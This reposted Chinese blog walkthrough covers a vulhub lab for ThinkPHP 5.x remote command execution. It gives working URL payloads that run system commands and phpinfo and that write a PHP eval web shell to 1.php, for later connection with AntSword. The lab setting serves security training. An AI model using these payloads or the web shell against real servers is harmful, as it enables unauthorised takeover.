自学内容网 自学内容网

Thinkphp5x远程命令执行 靶场攻略

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

[]=whoami

3.远程代码执行

POC:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

4.写入一句话木马到根目录下的1.php

POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > 1.php

5.蚁剑连接

 


原文地址:https://blog.csdn.net/2301_81881972/article/details/142466091

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!